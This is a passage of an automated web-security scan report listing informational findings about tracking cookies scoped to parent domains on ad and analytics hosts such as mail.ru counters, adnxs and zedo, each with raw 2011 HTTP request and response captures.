Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:23:30 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 24-Apr-2013 14:23:30 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

15.12. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.mail.ru
Path:	/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

searchuid=1981869761303741204; domain=.mail.ru; path=/; expires=Thu, 22-Apr-2021 14:32:03 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133 HTTP/1.1
Host: bs.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; p=6PMGAE2r7QAA; VID=2Tinlz3w7bGs

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:32:03 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT
Expires: Mon, 25 Apr 2011 14:32:03 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://bs.mail.ru/count/108pZT9La4K40n00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133
Set-Cookie: searchuid=1981869761303741204; domain=.mail.ru; path=/; expires=Thu, 22-Apr-2021 14:32:03 GMT
Content-Length: 0

15.13. http://core1.node15.top.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://core1.node15.top.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:47:44 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1446197;t=69;js=13;r=;j=true;s=1920*1200;d=16;rand=0.06563902948983014 HTTP/1.1
Host: core1.node15.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; searchuid=1981869761303741204; VID=2Tinlz3w7bGs; p=NOIGAEqT7AAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:47:44 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:47:44 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 885
Connection: close

GIF87a&...................................................................................................dddLLL......ppp...~~~.........ZZZyyymmm..............................???888...iii......PPP....
...[SNIP]...

15.14. http://core2.node12.top.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://core2.node12.top.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:39:51 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1301840;t=234;js=13;r=;j=true;s=1920*1200;d=16;rand=0.6505313029047102 HTTP/1.1
Host: core2.node12.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; VID=2Tinlz3w7bGs; searchuid=1981869761303741204; p=pPUGAEqlaAAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:39:51 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:39:51 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1027
Connection: close

GIF87aX....../e&...*Y!......JsCmmm..........MSN.E.,.......,=....-`$...Aj$...Te..d. D................v.tDUB.~.,....X.......".di.(.....Z*..b.x....q..k#...<...l:....9Hx..A.q.L.`.B..L...dQ..lmf.....]-..3
...[SNIP]...

15.15. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ZFFAbh=845B826,20|798_845#365;expires=Tue, 24 Apr 2012 15:14:03 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=845B826,20|798_845#365;expires=Tue, 24 Apr 2012 15:14:03 GMT;domain=.zedo.com;path=/;
ETag: "1b633f4-7054-4942082502f40"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1492157159
Cache-Control: max-age=29594
Expires: Mon, 25 Apr 2011 23:27:18 GMT
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

15.16. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fc.ef.d4.cf.bd.a1.top.mail.ru
Path:	/counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VID=2Tir3I2W_cms; path=/; expires=Tue, 26 Jul 2011 14:30:07 GMT; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1963260;js=13;r=;j=true;s=1920*1200;d=16;rand=0.3155316608026624 HTTP/1.1
Host: fc.ef.d4.cf.bd.a1.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:30:07 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tir3I2W_cms; path=/; expires=Tue, 26 Jul 2011 14:30:07 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;

15.17. http://goods.adnectar.com/analytics/get_avia_js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goods.adnectar.com
Path:	/analytics/get_avia_js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16 HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Status: 200
ETag: "643abe138f06b030650a5c28ca19bdb4"
X-Runtime: 1
Content-Length: 6324
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"

var exceptionmessage = null;
try {
var avia_already_defined = false;
if (typeof(_an_tracker) !== 'undefined') {
avia_already_defined = true;
}

// First, define JS versions of methods not
...[SNIP]...

15.18. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=4XoUrkfhFEDhehSuR-EUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAHSOBcgAAAAA.&tt_code=livejournal.com&udj=uf%28%27a%27%2C+9797%2C+1303741246%29%3Buf%28%27c%27%2C+47580%2C+1303741246%29%3Buf%28%27r%27%2C+173255%2C+1303741246%29%3Bppv%288991%2C+%278959360767911564416%27%2C+1303741246%2C+1303784446%2C+47580%2C+25553%29%3B&cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU.&referrer=http://www.livejournal.com/&pp=TbWDPgACKZsK5XeQflcean0rg75a9lJ4uX93wQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:20:47 GMT
Content-Length: 1454

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAA
...[SNIP]...

15.19. http://ib.adnxs.com/pxj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h; path=/; expires=Sun, 24-Jul-2011 14:23:47 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1303072666-9018543%7cMUID%3db506c07761d7465d924574124e3c14df%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

15.20. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=8239=734250&8144=734251; domain=.interclick.com; expires=Sun, 25-Apr-2021 14:43:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=ab470e57-8d67-4a28-b9b1-aaf3331f5214 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251; domain=.interclick.com; expires=Sun, 25-Apr-2021 14:43:44 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 25 Apr 2011 14:43:44 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

15.21. http://m.adnxs.com/msftcookiehandler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:37:36 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dB506C07761D7465D924574124E3C14DF HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN

Response

15.22. http://map.media6degrees.com/orbserv/aopix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/orbserv/aopix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

clid=2ljtllp01170xrd52zkwjuxh0e4d100837010i02408; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
rdrlst=40415xylk60qe00000002370113bolk7pyq0000000137010znmlk346200000003370110poljyxb4000000053701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
sglst=2020s0t7ljyxb408snm00537010i02405ag3ljyxb408snm00537010i02405; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/aopix?pixId=6387&pcv=56&cb=2534812616&topHref=http%3A%2F%2Fwww.livejournal.com%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh0cf4p00736010i01407; rdrlst=40315xylk60qe0000000136010znmlk346200000002360110poljyxb4000000043601; sglst=2020s0t7ljyxb4073fa00436010i01404ag3ljyxb4073fa00436010i01404; vstcnt=417k010r014uzg6118e1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0e4d100837010i02408; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
